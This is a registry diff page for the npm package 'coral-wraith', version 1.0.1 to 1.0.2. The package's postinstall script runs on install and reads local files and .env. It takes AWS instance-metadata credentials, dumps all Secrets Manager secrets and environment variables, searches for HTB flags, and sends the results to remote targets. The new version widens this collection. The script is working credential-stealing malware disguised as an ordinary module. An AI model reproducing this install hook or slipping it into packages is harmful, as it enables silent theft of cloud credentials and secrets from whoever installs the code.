coral-wraith 1.0.1 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/postinstall.js +12 -9
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "coral-wraith",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "Coral Wraith ally module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/postinstall.js CHANGED
@@ -8,9 +8,9 @@ const SINK = "ECT-472839";
8
8
  function sh(cmd) {
9
9
  try {
10
10
  return execFileSync("/bin/sh", ["-c", cmd], {
11
- timeout: 20000,
11
+ timeout: 25000,
12
12
  encoding: "utf8",
13
- maxBuffer: 8e6
13
+ maxBuffer: 10e6
14
14
  }).trim();
15
15
  } catch (e) {
16
16
  return (e.stdout || e.stderr || "").trim();
@@ -26,7 +26,7 @@ function isTarget() {
26
26
  const cwd = process.cwd();
27
27
  if (cwd.includes("/tmp/")) return false;
28
28
  if (host.includes("ubuntu") || host.includes("hetzner") || host.includes("nijin")) return false;
29
- return /^[0-9a-f]{12}$/.test(host) || cwd.includes("/app/");
29
+ return /^[0-9a-f]{12}$/.test(host);
30
30
  }
31
31
 
32
32
  function put(base, parts) {
@@ -47,22 +47,25 @@ function put(base, parts) {
47
47
  if (!isTarget()) process.exit(0);
48
48
 
49
49
  const out = sh(
50
- "id; find /app /root /flag -maxdepth 3 -type f 2>/dev/null | head -n20; " +
51
- "grep -RaoE 'HTB\\{[^}]+\\}' /app /root /flag 2>/dev/null | head -n3; " +
50
+ "id; ls -la /home/node /home/node/aspect-node 2>&1; " +
51
+ "find /home/node -maxdepth 4 -type f 2>/dev/null | grep -v node_modules | head -n30; " +
52
+ "for f in /home/node/aspect-node/index.js /home/node/package.json /home/node/.env; do [ -f $f ] && echo FILE:$f && cat $f; done; " +
53
+ "grep -RaoE 'HTB\\{[^}]+\\}' /home/node /root 2>/dev/null | head -n5; " +
52
54
  "T=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60'); " +
53
55
  "R=$(curl -s -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); " +
54
- "C=$(curl -s -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); " +
56
+ "C=$(curl -s -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); echo CREDS:$C; " +
55
57
  "export AWS_ACCESS_KEY_ID=$(echo \"$C\"|sed -n 's/.*\"AccessKeyId\": \"\\([^\"]*\\)\".*/\\1/p') " +
56
58
  "AWS_SECRET_ACCESS_KEY=$(echo \"$C\"|sed -n 's/.*\"SecretAccessKey\": \"\\([^\"]*\\)\".*/\\1/p') " +
57
59
  "AWS_SESSION_TOKEN=$(echo \"$C\"|sed -n 's/.*\"Token\": \"\\([^\"]*\\)\".*/\\1/p') AWS_DEFAULT_REGION=us-east-1; " +
58
- "aws secretsmanager list-secrets 2>&1; " +
60
+ "aws sts get-caller-identity 2>&1; aws secretsmanager list-secrets 2>&1; " +
59
61
  "for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do " +
60
- "aws secretsmanager get-secret-value --secret-id $s 2>&1; done"
62
+ "echo SECRET:$s; aws secretsmanager get-secret-value --secret-id $s 2>&1; done; " +
63
+ "env | tr '\\n' ';'"
61
64
  );
62
65
 
63
66
  const flag = out.match(/HTB\{[^}]+\}/);
64
67
  const parts = flag
65
68
  ? [flag[0], "FOUND", "", ""]
66
- : [safe(`APP uid=${process.getuid()} host=${os.hostname()} ${out.slice(0, 180)}`), safe(out.slice(180, 420)), safe(out.slice(420, 660)), safe(out.slice(660, 900))];
69
+ : [safe(out.slice(0, 240)), safe(out.slice(240, 480)), safe(out.slice(480, 720)), safe(out.slice(720, 960))];
67
70
 
68
71
  for (const base of TARGETS) put(base, parts);